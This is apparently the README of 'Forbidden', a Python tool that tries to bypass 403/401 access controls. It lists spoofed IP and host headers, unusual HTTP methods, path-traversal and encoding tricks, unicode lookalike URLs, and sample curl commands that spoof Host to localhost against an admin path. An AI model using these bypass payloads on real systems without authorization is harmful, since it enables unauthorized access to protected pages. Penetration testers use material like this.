Forbidden
Bypass 4xx HTTP response status codes.
To see all the test cases, check the source code - follow the NOTE
comments.
Script uses multithreading, and is based on brute forcing so might have some false positives. Script uses colored output.
Extend this script to your liking.
Tested on Kali Linux v2021.4 (64-bit).
Made for educational purposes. I hope it will help!
Future plans:
- file uploads with HTTP PUT,
- cross-site tracing (XST),
- basic authentication.
Table of Contents
How to Run
Open your preferred console from /src/ and run the commands shown below.
Install required packages:
pip3 install -r requirements.txt
Run the script:
python3 forbidden.py
Download a user agent list from here.
Parsed URL Format
To see all the default values used in the script, check the source code - follow the NOTE
comments.
{
"urls": [
"http://example.com/admin",
"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ/ᴬᴰᴹᴵᴺ"
],
"scheme_domains": [
"http://example.com",
"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ"
],
"domains": [
"example.com",
"ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ"
],
"paths": [
"admin",
"/admin",
"admin/",
"/admin/",
"ᴬᴰᴹᴵᴺ",
"/ᴬᴰᴹᴵᴺ",
"ᴬᴰᴹᴵᴺ/",
"/ᴬᴰᴹᴵᴺ/"
],
"all": [
"http://example.com/admin",
"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ/ᴬᴰᴹᴵᴺ",
"http://example.com",
"http://ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ",
"example.com",
"ᴱxᴬᴹᴾᴸᴱ.cᴼᴹ",
"admin",
"/admin",
"admin/",
"/admin/",
"ᴬᴰᴹᴵᴺ",
"/ᴬᴰᴹᴵᴺ",
"ᴬᴰᴹᴵᴺ/",
"/ᴬᴰᴹᴵᴺ/"
]
}
HTTP Headers
Client-IP
Cluster-Client-IP
Connection
Contact
Forwarded
Forwarded-For
Forwarded-For-Ip
From
Host
Origin
Referer
Stuff
True-Client-IP
X-Client-IP
X-Custom-IP-Authorization
X-Forward
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Server
X-Forward-For
X-Forwared-Host
X-Host
X-HTTP-Host-Override
X-Original-URL
X-Originating-IP
X-Override-URL
X-ProxyUser-IP
X-Real-IP
X-Remote-Addr
X-Remote-IP
X-Rewrite-URL
X-Wap-Profile
X-Server-IP
X-Target
HTTP Methods
ACL
ARBITRARY
BASELINE-CONTROL
BIND
CHECKIN
CHECKOUT
CONNECT
COPY
DELETE
GET
HEAD
INDEX
LABEL
LINK
LOCK
MERGE
MKACTIVITY
MKCALENDAR
MKCOL
MKREDIRECTREF
MKWORKSPACE
MOVE
OPTIONS
ORDERPATCH
PATCH
POST
PRI
PROPFIND
PROPPATCH
PUT
REBIND
REPORT
SEARCH
SHOWMETHOD
SPACEJUMP
TEXTSEARCH
TRACE
TRACK
UNBIND
UNCHECKOUT
UNLINK
UNLOCK
UPDATE
UPDATEREDIRECTREF
VERSION-CONTROL
URL Paths
/
//
/%2e
/%2e/
/.
/./
/..
/../
/;
/;/
/.;
/.;/
/..;
/..;/
%20
%20/
%09
%09/
;foo=bar;
/;foo=bar;
;foo=bar;/
/;foo=bar;/
~
~~
/~randomstring
#
##
/#randomstring
?
??
/?randomstring
/*
/**
/*randomstring
.jsp
.jspa
.jspx
.jhtml
.html
.sht
.shtml
.xhtml
.php
.asp
.aspx
.esp
Results Format
[
{
"id": 9,
"url": "https://example.com/admin",
"method": "GET",
"headers": [
"Host: localhost"
],
"agent": null,
"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: localhost' -X 'GET' 'https://example.com/admin'",
"code": "302",
"length": "142"
},
{
"id": 49,
"url": "https://example.com/admin",
"method": "GET",
"headers": [
"Host: localhost:80"
],
"agent": null,
"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: localhost:80' -X 'GET' 'https://example.com/admin'",
"code": "302",
"length": "142"
},
{
"id": 169,
"url": "https://example.com/admin",
"method": "GET",
"headers": [
"Host: 127.0.0.1"
],
"agent": null,
"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: 127.0.0.1' -X 'GET' 'https://example.com/admin'",
"code": "302",
"length": "142"
},
{
"id": 209,
"url": "https://example.com/admin",
"method": "GET",
"headers": [
"Host: 127.0.0.1:80"
],
"agent": null,
"command": "curl -i -s -m 3 --connect-timeout 3 -k -L --path-as-is -H 'Host: 127.0.0.1:80' -X 'GET' 'https://example.com/admin'",
"code": "302",
"length": "142"
}
]
Images
Figure 1 - Help